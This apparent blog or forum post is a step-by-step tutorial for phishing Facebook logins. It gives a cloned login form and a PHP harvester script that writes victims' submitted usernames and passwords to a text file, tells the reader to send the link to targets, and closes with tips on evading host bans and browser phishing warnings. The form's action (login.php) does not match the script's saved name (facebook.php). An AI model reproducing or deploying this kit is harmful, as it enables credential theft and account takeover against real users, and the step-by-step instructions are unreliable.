STEP 1:
Register at ony of free webhosting websites
I suggest you use 0fees.net or 000webhost.com
STEP 2:
Open facebook homepage (Welcome to facebook) when you are logged out. Open its source (Ctrl+U) and copy it.
Create a notepad file and paste it all there.
Save the file with name "index.html" (without the "") and close it.
STEP 3:
Create another notepad file and
paste this script there.
PHP Code:
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("ali.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save it by name
facebook.php (or anyother name but with same extension)
STEP 4:
Open the
index.html file with notepad and FIND for word
"action" you will see something like this;
Code:
<form id="login_form" action="https://www.facebook.com/login.php?..........
Remove all the form tag (i.e starting from
<form id="logi....... to the "</form>" )
And Replace it with this command.
Code:
<form method="GET" action="login.php" id="login_form" onsubmit=";var d = document.documentElement;return d.onsubmit && d.onsubmit(event);">
<div id="loginform" style=""><table cellspacing="0"><tr><td class="html7magic"><label for="email" id="label_email">Email or Phone</label></td><td class="html7magic"><label for="pass" id="label_pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" id="email" name="email" value="" onkeypress="formchange()" /><td><input type="password" class="inputpassword" id="pass" name="pass" value="" /></td><td><label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_6"><input value="Log In" tabindex="4" type="submit" id="u_0_6" /></label></td></tr><tr><td class="login_form_label_field"><div><div class="uiInputLabel clearfix"><input id="persist_box" type="checkbox" name="persistent" value="1" tabindex="3" class="uiInputLabelCheckbox" /><label for="persist_box">Keep me logged in</label></div><input type="hidden" name="default_persistent" value="0" /></div></td><td class="login_form_label_field"><a rel="nofollow" href="http://www.facebook.com/recover/initiate">Forgot your password?</a></td></tr></table></div></form>
Now save it and close it.
STEP 5:
Now open the webhosting website
(i prefer 0fees.net) and you would see File Manager there.
Open it and youll see sub folder named "htdocs" there. Open it and upload the index.html and facebook.php
there. (Delete all other files already present in the folder "htdocs")
STEP 6:
Now go to your chosen domain (in my case, saak.0fees.net) and see the homepage. You will see the exact homepage as facebook's welcome page. give the link to someone, when they login to that, their login details would be sent to you automatically.
STEP 7:
Now open
yourdomain/ali.txt e.g myfacebook.0fees.net/ali.txt
and you would see the username and password of all the victims who logged on the page.
You can also log back to your File Manager and to you
"htdocs" folder and there you would see another file named
ali.txt
open it and you will see all info there too.
Enjoy (:
If you have and problems or questions. Kindly Comment or ask me without any hesitation.
Thankyou
Source: My Own Blog
Note: You might need to be careful while spreading this link as if the web server gets a single info about your server being a phisher, is gonna be banned. Also watch out from chrome security, it blocks your phisher page, so victim knows you're trying to hack them.
Warning: This tutorial should only be used for educational purposes so Im not responsible for any actions caused by it.